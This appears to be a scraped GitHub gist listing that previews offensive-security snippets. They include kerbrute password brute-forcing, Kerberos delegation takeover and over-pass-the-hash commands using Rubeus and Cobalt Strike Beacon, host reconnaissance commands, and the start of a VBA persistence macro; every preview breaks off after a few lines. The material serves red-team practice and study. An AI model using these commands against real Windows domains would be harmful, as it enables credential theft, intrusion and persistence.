With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
John Cartrett jnqpblc
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
HarmJ0y
/ rbcd_demo.ps1
Last active
June 8, 2024 18:13
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
rsmudge
/ initial.cna
Created
February 20, 2019 20:33
How to automate Beacon to execute a sequence of tasks with each checkin...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Demonstrate how to queue tasks to execute with each checkin... | |
| # | |
| # | |
| # yield tells a function to pause and return a value. The next time the same instance of the | |
| # function is called, it will resume after where it last yielded. | |
| # | |
| sub stuffToDo { | |
| # Tasks for first checkin |
jhaddix
/ all.txt
Created
January 19, 2019 04:35
— forked from orangetw/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Before first PowerShell usage you might have to adapt the policies | |
| # Get-ExecutionPolicy -List | |
| # Set-ExecutionPolicy Unrestricted -Scope CurrentUser | |
| # -------------------------------------------------------------------------------- | |
| # This setup is only necessary once | |
| # Insert the password into the empty string below and run script | |
| # powershell creates a text file with the (encrypted credentials, Windows Data Protection API) | |
| # then the watchdog acesses it... | |
| #$secureStringPwd = "test" | ConvertTo-SecureString -AsPlainText -Force |
HarmJ0y
/ gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active
May 19, 2024 13:24
Over-pass-the-hash with Rubeus and Beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
HarmJ0y
/ cobaltstrike_sa.txt
Created
September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
interference-security
/ simple-https-server.py
Created
August 10, 2018 07:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| import BaseHTTPServer, SimpleHTTPServer, logging | |
| import ssl | |
| import sys | |
| import cgi | |
| class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
| def do_GET(self): | |
| #logging.error(self.headers) |
cynicXer
/ masscan_to_nmap.py
Created
December 8, 2017 21:40
Parse a masscan output and run an nmap scan on it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # import masscan output and run an nmap scan on the results | |
| # | |
| import sys | |
| import argparse | |
| from libnmap.parser import NmapParser, NmapParserException | |
| from libnmap.process import NmapProcess |
mgeeky
/ vba-windows-persistence.vbs
Last active
September 4, 2021 04:38
VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' This macro implements two windows persistence methods: | |
| ' - WMI Event Filter object creation | |
| ' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64 | |
| ' | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' |
NewerOlder